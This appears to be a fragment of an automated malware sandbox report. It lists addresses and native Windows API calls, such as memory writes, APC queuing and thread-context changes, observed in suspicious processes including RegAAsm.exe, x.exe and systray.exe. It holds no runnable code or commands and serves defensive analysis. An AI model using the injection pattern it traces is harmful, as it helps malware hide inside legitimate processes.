              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412AB0 NtWaitForSingleObject,5_2_01412AB0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01413D70 NtOpenThread,5_2_01413D70
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412D00 NtSetInformationFile,5_2_01412D00
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412D10 NtMapViewOfSection,5_2_01412D10
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01413D10 NtOpenProcessToken,5_2_01413D10
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412D30 NtUnmapViewOfSection,5_2_01412D30
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412DD0 NtDelayExecution,5_2_01412DD0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412DB0 NtEnumerateKey,5_2_01412DB0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412C60 NtCreateKey,5_2_01412C60
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412C00 NtQueryInformationProcess,5_2_01412C00
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412CC0 NtQueryVirtualMemory,5_2_01412CC0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412CF0 NtOpenProcess,5_2_01412CF0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412CA0 NtQueryInformationToken,5_2_01412CA0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412F60 NtCreateProcessEx,5_2_01412F60
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412F30 NtCreateSection,5_2_01412F30
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412FE0 NtCreateFile,5_2_01412FE0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412F90 NtProtectVirtualMemory,5_2_01412F90
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412FA0 NtQuerySection,5_2_01412FA0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412FB0 NtResumeThread,5_2_01412FB0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412E30 NtWriteVirtualMemory,5_2_01412E30
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412EE0 NtQueueApcThread,5_2_01412EE0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412E80 NtReadVirtualMemory,5_2_01412E80
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01412EA0 NtAdjustPrivilegesToken,5_2_01412EA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE35C0 NtCreateMutant,LdrInitializeThunk,9_2_04DE35C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE4650 NtSuspendThread,LdrInitializeThunk,9_2_04DE4650
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE4340 NtSetContextThread,LdrInitializeThunk,9_2_04DE4340
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04DE2CA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04DE2C70
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2C60 NtCreateKey,LdrInitializeThunk,9_2_04DE2C60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2DD0 NtDelayExecution,LdrInitializeThunk,9_2_04DE2DD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04DE2DF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04DE2D10
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04DE2D30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04DE2EE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04DE2E80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2FE0 NtCreateFile,LdrInitializeThunk,9_2_04DE2FE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2FB0 NtResumeThread,LdrInitializeThunk,9_2_04DE2FB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2F30 NtCreateSection,LdrInitializeThunk,9_2_04DE2F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE39B0 NtGetContextThread,LdrInitializeThunk,9_2_04DE39B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2AD0 NtReadFile,LdrInitializeThunk,9_2_04DE2AD0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2AF0 NtWriteFile,LdrInitializeThunk,9_2_04DE2AF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04DE2BF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04DE2BE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04DE2BA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2B60 NtClose,LdrInitializeThunk,9_2_04DE2B60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE3090 NtSetValueKey,9_2_04DE3090
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE3010 NtOpenDirectoryObject,9_2_04DE3010
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2CC0 NtQueryVirtualMemory,9_2_04DE2CC0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2CF0 NtOpenProcess,9_2_04DE2CF0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2C00 NtQueryInformationProcess,9_2_04DE2C00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2DB0 NtEnumerateKey,9_2_04DE2DB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE3D70 NtOpenThread,9_2_04DE3D70
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE3D10 NtOpenProcessToken,9_2_04DE3D10
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2D00 NtSetInformationFile,9_2_04DE2D00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2EA0 NtAdjustPrivilegesToken,9_2_04DE2EA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2E30 NtWriteVirtualMemory,9_2_04DE2E30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2F90 NtProtectVirtualMemory,9_2_04DE2F90
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2FA0 NtQuerySection,9_2_04DE2FA0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2F60 NtCreateProcessEx,9_2_04DE2F60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2AB0 NtWaitForSingleObject,9_2_04DE2AB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE2B80 NtQueryInformationFile,9_2_04DE2B80
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BD9740 NtReadFile,9_2_02BD9740
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BD95D0 NtCreateFile,9_2_02BD95D0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BD9A40 NtAllocateVirtualMemory,9_2_02BD9A40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BD98D0 NtClose,9_2_02BD98D0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BD9830 NtDeleteFile,9_2_02BD9830
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBF1C6 NtQueryInformationProcess,9_2_04BBF1C6
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00007FF848AC08134_2_00007FF848AC0813
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00007FF848AC06004_2_00007FF848AC0600
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00007FF848AC05A04_2_00007FF848AC05A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E89D35_2_007E89D3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007FF0B35_2_007FF0B3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E01A25_2_007E01A2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E01A35_2_007E01A3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D22E05_2_007D22E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D22DC5_2_007D22DC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D2A805_2_007D2A80
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E6BD35_2_007E6BD3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E6BCE5_2_007E6BCE
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E03C35_2_007E03C3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DE3B35_2_007DE3B3
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DE3B25_2_007DE3B2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DE4FD5_2_007DE4FD
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DE5035_2_007DE503
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D2F505_2_007D2F50
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D2F475_2_007D2F47
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014681585_2_01468158
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014AB16B5_2_014AB16B
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0141516C5_2_0141516C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D01005_2_013D0100
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CF1725_2_013CF172
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147A1185_2_0147A118
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014981CC5_2_014981CC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EB1B05_2_013EB1B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A01AA5_2_014A01AA
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148F0CC5_2_0148F0CC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014970E95_2_014970E9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149F0E05_2_0149F0E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E70C05_2_013E70C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149A3525_2_0149A352
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149132D5_2_0149132D
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CD34C5_2_013CD34C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A03E65_2_014A03E6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EE3F05_2_013EE3F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0142739A5_2_0142739A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014802745_2_01480274
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E52A05_2_013E52A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014812ED5_2_014812ED
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB2C05_2_013FB2C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E05355_2_013E0535
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014975715_2_01497571
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014A05915_2_014A0591
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147D5B05_2_0147D5B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014924465_2_01492446
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D14605_2_013D1460
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149F43F5_2_0149F43F
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148E4F65_2_0148E4F6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014047505_2_01404750
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E07705_2_013E0770
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149F7B05_2_0149F7B0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DC7C05_2_013DC7C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014916CC5_2_014916CC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FC6E05_2_013FC6E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F69625_2_013F6962
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E99505_2_013E9950
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FB9505_2_013FB950
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E29A05_2_013E29A0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_014AA9A65_2_014AA9A6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D8005_2_0144D800
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EA8405_2_013EA840
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E28405_2_013E2840
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013C68B85_2_013C68B8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0140E8F05_2_0140E8F0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E38E05_2_013E38E0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149AB405_2_0149AB40
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149FB765_2_0149FB76
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01496BD75_2_01496BD7
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01455BF05_2_01455BF0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0141DBF95_2_0141DBF9
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FFB805_2_013FFB80
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149FA495_2_0149FA49
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01497A465_2_01497A46
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01453A6C5_2_01453A6C
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0148DAC65_2_0148DAC6
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DEA805_2_013DEA80
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01425AA05_2_01425AA0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0147DAAC5_2_0147DAAC
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01491D5A5_2_01491D5A
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01497D735_2_01497D73
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013EAD005_2_013EAD00
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E3D405_2_013E3D40
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F8DBF5_2_013F8DBF
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013DADE05_2_013DADE0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013FFDC05_2_013FFDC0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0C005_2_013E0C00
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01459C325_2_01459C32
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149FCF25_2_0149FCF2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D0CF25_2_013D0CF2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01480CB55_2_01480CB5
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01454F405_2_01454F40
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149FF095_2_0149FF09
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01422F285_2_01422F28
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01400F305_2_01400F30
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E1F925_2_013E1F92
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013ECFE05_2_013ECFE0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D2FC85_2_013D2FC8
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149FFB15_2_0149FFB1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E0E595_2_013E0E59
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149EE265_2_0149EE26
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013E9EB05_2_013E9EB0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149EEDB5_2_0149EEDB
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013F2E905_2_013F2E90
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0149CE935_2_0149CE93
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015FC9198_2_015FC919
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E2B998_2_015E2B99
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DDA098_2_015DDA09
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DDA088_2_015DDA08
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E62398_2_015E6239
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DBD698_2_015DBD69
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DBD638_2_015DBD63
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DBC198_2_015DBC19
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DBC188_2_015DBC18
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E44398_2_015E4439
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E44348_2_015E4434
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015DDC298_2_015DDC29
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E5E4F69_2_04E5E4F6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E624469_2_04E62446
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DA14609_2_04DA1460
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6F43F9_2_04E6F43F
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E4D5B09_2_04E4D5B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E705919_2_04E70591
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E675719_2_04E67571
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB05359_2_04DB0535
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E616CC9_2_04E616CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DCC6E09_2_04DCC6E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DAC7C09_2_04DAC7C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6F7B09_2_04E6F7B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DD47509_2_04DD4750
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB07709_2_04DB0770
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6F0E09_2_04E6F0E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E670E99_2_04E670E9
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB70C09_2_04DB70C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E5F0CC9_2_04E5F0CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E681CC9_2_04E681CC
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E701AA9_2_04E701AA
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DBB1B09_2_04DBB1B0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E7B16B9_2_04E7B16B
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04D9F1729_2_04D9F172
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DE516C9_2_04DE516C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DA01009_2_04DA0100
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E4A1189_2_04E4A118
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E512ED9_2_04E512ED
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DCB2C09_2_04DCB2C0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB52A09_2_04DB52A0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E502749_2_04E50274
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E703E69_2_04E703E6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DBE3F09_2_04DBE3F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DF739A9_2_04DF739A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04D9D34C9_2_04D9D34C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6A3529_2_04E6A352
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6132D9_2_04E6132D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6FCF29_2_04E6FCF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DA0CF29_2_04DA0CF2
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E50CB59_2_04E50CB5
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E29C329_2_04E29C32
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB0C009_2_04DB0C00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DCFDC09_2_04DCFDC0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DAADE09_2_04DAADE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DC8DBF9_2_04DC8DBF
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E67D739_2_04E67D73
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB3D409_2_04DB3D40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E61D5A9_2_04E61D5A
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DBAD009_2_04DBAD00
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6EEDB9_2_04E6EEDB
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DC2E909_2_04DC2E90
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB9EB09_2_04DB9EB0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6CE939_2_04E6CE93
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB0E599_2_04DB0E59
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6EE269_2_04E6EE26
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DA2FC89_2_04DA2FC8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DBCFE09_2_04DBCFE0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB1F929_2_04DB1F92
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6FFB19_2_04E6FFB1
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E24F409_2_04E24F40
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DD0F309_2_04DD0F30
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04E6FF099_2_04E6FF09
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DF2F289_2_04DF2F28
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DDE8F09_2_04DDE8F0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB38E09_2_04DB38E0
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04D968B89_2_04D968B8
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DB28409_2_04DB2840
